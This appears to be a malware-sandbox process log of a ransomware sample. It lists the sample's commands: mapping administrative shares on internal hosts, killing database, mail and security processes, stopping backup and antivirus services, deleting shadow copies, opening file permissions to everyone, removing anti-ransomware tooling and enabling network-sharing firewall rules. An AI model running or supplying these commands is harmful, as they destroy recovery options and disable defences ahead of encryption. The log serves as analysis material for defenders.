C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.10\U$2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.10\V$2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.10\W$2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM thebat64.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.10\X$2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.10\Y$2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM ocomm.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.10\Z$2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM infopath.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.11\Users2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.11\A$2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.11\B$2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM zoolz.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.11\C$2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.11\E$2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.11\D$2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.11\F$2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.11\G$2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM onenote.exe /F2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.11\H$2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" IM thunderbird.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM msftesql.exe /F2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM msaccess.exe /F2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.11\I$2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM outlook.exe /F2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.11\J$2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.11\K$2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.11\L$2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM visio.exe /F2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.11\M$2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.11\N$2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM winword.exe /F2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.11\O$2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.11\P$2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.15\Q$2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.15\R$2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.15\A$2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM wordpad.exe /F2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.15\B$2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.15\S$2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.15\T$2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM synctime.exe /F2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.15\U$2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.15\D$2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.15\V$2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.15\W$2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM ocssd.exe /F2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.15\F$2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\Users2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM oracle.exe /F2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\X$2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\Y$2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\H$2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\B$2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\Z$2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\I$2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\C$2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\J$2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\D$2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.14\Users2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.14\K$2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.14\E$2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.14\A$2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.14\L$2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls" "C:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls" "D:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.14\B$2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.14\M$2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls" "Z:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.14\C$2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.14\N$2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.14\G$2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.14\D$2⤵
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s FDResPub1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s upnphost1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_filter /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sophossps /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y2⤵
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_update_64 /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos MCS Client” /y1⤵
-
C:\Windows\PSEXESVC.exeC:\Windows\PSEXESVC.exe1⤵
-
C:\Windows\47b51b615fe22292caf30a30a4d4057cf57a283a61045190b2a2331b763b6125.bin.sample.exe"47b51b615fe22292caf30a30a4d4057cf57a283a61045190b2a2331b763b6125.bin.sample.exe"2⤵
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM RaccineSettings.exe3⤵
-
-
C:\Windows\system32\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop zhudongfangyu /y4⤵
-
-
-
C:\Windows\system32\reg.exe"reg" delete HKCU\Software\Raccine /F3⤵
- Modifies registry key
-
-
C:\Windows\system32\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F3⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config Dnscache start= auto3⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config FDResPub start= auto3⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config SstpSvc start= disabled3⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLWriter start= disabled3⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config upnphost start= auto3⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop bedbg /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop bedbg /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop DCAgent /y5⤵
-
-
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c rd /s /q D:\\$Recycle.bin3⤵
-
-
C:\Windows\system32\net.exe"net.exe" start FDResPub /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start FDResPub /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" start Dnscache /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start Dnscache /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" start SSDPSRV /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start SSDPSRV /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MMS /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MMS /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop avpsus /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop avpsus /y4⤵
-
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes3⤵
-
-
C:\Windows\system32\net.exe"net.exe" start upnphost /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start upnphost /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop EhttpSrv /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EhttpSrv /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SQLEXPRESS /y3⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop McAfeeDLPAgentService /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop mozyprobackup /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mozyprobackup /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop mfewc /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfewc /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ekrn /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ekrn /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ccEvtMgr /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccEvtMgr /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SstpSvc /y5⤵
-
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BMR Boot Service /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SYSTEM_BGC /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ccSetMgr /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop EPSecurityService /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EPSecurityService /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$TPS /y3⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$VEEAMSQL2008R2 /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SavRoam /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SavRoam /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop DefWatch /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop DefWatch /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop EPUpdateService /y3⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop ntrtscan /y3⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop EsgShKernel /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EsgShKernel /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop RTVscan /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop RTVscan /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$TPSAMA /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$TPSAMA /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop QBFCService /y3⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop PDVFSService /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop QBIDPService /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBIDPService /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamTransportSvc /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$VEEAMSQL2008R2 /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop FA_Scheduler /y5⤵
-
-
-
-
C:\Windows\system32\net.exe"net.exe" stop Intuit.QuickBooks.FCS /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop KAVFS /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop KAVFS /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VSNAPVSS /y3⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop QBCFMonitorService /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ESHASRV /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ESHASRV /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamDeploymentService /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLWriter /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLWriter /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamNFSSvc /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPS /y5⤵
-
-
-
-
C:\Windows\system32\net.exe"net.exe" stop YooBackup /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooBackup /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SDRSVC /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SDRSVC /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$SBSMONITORING /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop veeam /y3⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop PDVFSService /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop macmnsvc /y5⤵
-
-
-
-
C:\Windows\system32\net.exe"net.exe" stop YooIT /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooIT /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y5⤵
-
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$VEEAMSQL2012 /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop KAVFSGT /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop KAVFSGT /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecVSSProvider /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamBackupSvc /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamBackupSvc /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop FA_Scheduler /y3⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop zhudongfangyu /y3⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop stc_raw_agent /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop stc_raw_agent /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecAgentAccelerator /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$SHAREPOINT /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamBrokerSvc /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamBrokerSvc /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Enterprise Client Service” /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Enterprise Client Service” /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecAgentBrowser /y3⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop “SQL Backups /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “SQL Backups /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecDiveciMediaService /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$SQL_2008 /y3⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop McAfeeEngineService /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeEngineService /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecJobEngine /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop klnagent /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop klnagent /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MsDtsServer100 /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer100 /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop NetMsmqActivator /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetMsmqActivator /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamCatalogSvc /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamCatalogSvc /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLServerADHelper100 /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper100 /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecRPCService /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSExchangeIS /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeIS /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop McAfeeFramework /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeFramework /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamHvIntegrationSvc /y3⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecManagementService /y3⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLServerADHelper /y3⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos AutoUpdate Service” /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop AcrSch2Svc /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y4⤵
-
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes3⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamMountSvc /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamMountSvc /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SamSs /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SamSs /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop AcronisAgent /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLServerOLAPService /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerOLAPService /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamCloudSvc /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamCloudSvc /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ReportServer /y3⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop McAfeeFrameworkMcAfeeFramework /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSExchangeMTA /y3⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop CASAD2DWebSvc /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CASAD2DWebSvc /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “SQLsafe Backup Service” /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “SQLsafe Backup Service” /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$TPS /y3⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop MsDtsServer110 /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer110 /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamNFSSvc /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ReportServer$SYSTEM_BGC /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop CAARCUpdateSvc /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CAARCUpdateSvc /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop masvc /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop masvc /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Device Control Service” /y3⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop MySQL57 /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MySQL57 /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Symantec System Recovery” /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Symantec System Recovery” /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop sophos /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sophos /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamDeploymentService /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSOLAP$SQL_2008 /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y4⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop McShield /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McShield /y4⤵
